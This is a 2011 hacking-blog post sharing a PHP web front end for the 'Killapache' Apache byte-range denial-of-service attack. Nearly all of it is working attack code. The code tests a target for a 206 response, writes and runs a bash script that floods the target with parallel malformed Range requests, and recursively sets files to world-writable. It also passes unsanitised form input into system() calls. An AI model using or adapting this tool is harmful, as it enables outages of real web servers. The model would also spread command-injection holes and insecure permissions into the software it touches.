lo0.ro cat /dev/null > stupidity – nobody is safe

3Oct/110

Killapache DDOS improved

[cc lang="html"]

/*

Devoted my ex-girlfriend Kh. Alana[from Kagan city] (;
k!ll m3 --- s4f3 the fuck'!n w0rldzzzzz
S4(uR4, r00tw0rm __2011__
w4tch u. h4ck u. fuck u.
Pr!v8 2 Publ!c
*/

error_reporting(0);
`chmod -R 777 *`;

?>




1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0             __      __   __                   __                           1
1           /'__`\  /'__`\/\ \__              /'__`\                         0
0     _ __ /\ \/\ \/\ \/\ \ \ ,_\  __  __  __/\ \/\ \  _ __    ___ ___       1
1    /\`'__\ \ \ \ \ \ \ \ \ \ \/ /\ \/\ \/\ \ \ \ \ \/\`'__\/' __` __`\     0
0    \ \ \/ \ \ \_\ \ \ \_\ \ \ \_\ \ \_/ \_/ \ \ \_\ \ \ \/ /\ \/\ \/\ \    1
1     \ \_\  \ \____/\ \____/\ \__\\ \___x___/'\ \____/\ \_\ \ \_\ \_\ \_\   0
0      \/_/   \/___/  \/___/  \/__/ \/__//__/   \/___/  \/_/  \/_/\/_/\/_/   1
1                                                                            0 
0                                                                            1
1                                       >> 4L4N4 K!LL3R                      0
0                                       >> author : S4(uR4                   1
1                                       >> sanjar[at]xakep[dot]ru            0
0                                       >> Priv8 v.0.1                       1
1                                       >> )c(  2011                         0
0                                                                            1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-0

[CHECK] (Vulned : "HTTP/1.1 206 Partial Content") ::

TESTED URL :


echo "
";
//if(!empty($_POST[0])){
echo "
"."[+] Server Test Running : 

";
       echo "
";
       system('curl -I -H "Range : bytes=0-1,0-2" -s '.$_POST["test_url"]);
       echo "

";

?>

[ATACK] ::

REQUEST :
THREADS :
URL :

[LOG] ::

echo "PWD :: ".`pwd`;
echo "
SYSTEM :: ".`uname -a`;
echo "
ID :: ".`id`;
echo "
DATE :: ".`date`."
";

$tmp1 = "alana_kill3r.sh";
`touch alana_kill3r.sh`;
$apache_killer = << #!/bin/bash
test "$1" == "" && echo $0 requests threads target-url && exit 0
seq 1 $1 | xargs -I{} -P $2 curl -I -H "User-Agent:" \
-H "Range: bytes=0-`printf ',5-%d' {10..1000}`" \
--compress -s $3 | grep HTTP
XPLOIT;

if (is_writable($tmp1)) {
if (!$handle = fopen($tmp1, 'w+')) {
echo "[x] Can't open file ($tmp1)";
exit;
}
if (fwrite($handle, $apache_killer) === FALSE) {
echo "[x] Can't write file ($tmp1)";
exit;
}
echo "
"."[+] ALL OK, xpl0it Writed";
fclose($handle);
} else {
echo "
[x] File $tmp1 has not access to write";
}

?>

echo" 

";
$pwd = "-al";
system("ls ".$pwd);
echo "

";
echo "
"."[+] Xploit Started with : 

";
       `chmod +x`.$tmp1;
       echo "
root@r00tw0rm:$ ";
       system("bash ./".$tmp1." ".$_POST["request"]." ".$_POST["threads"]." ".$_POST["url"]);
       echo "

";
?>



[/cc]

  • Google Reader
  • Facebook
  • Identi.ca
  • Twitter
  • Reddit
  • Delicious
  • E-Mail
  • StumbleUpon
  • Digg
  • Tumblr
Tagged as: , , , , , Leave a comment
Comments (0) Trackbacks (0)

No comments yet.


Leave a comment

No trackbacks yet.

» «

Add to Google

Disclaimer

This website was created for educational purposes. The owner will not take any responsibility for any action you cause using the information shown in this website. Please do not contact me with blackhat type hacking requests. Thanks

Categories

Tags

backup backup exec bruteforce debian directadmin DoS download exploit hack hacking how-to install install windows 7 lfi linux pentest perl php poc python rfi scanner script scripts secure code Security security scanner share shell social engineering source code sqli SQL injection sqli scanners ssh tool tools tutorial upload shell vbulletin Web Application Scanner windows windows 7 usb wordpress xss

Meta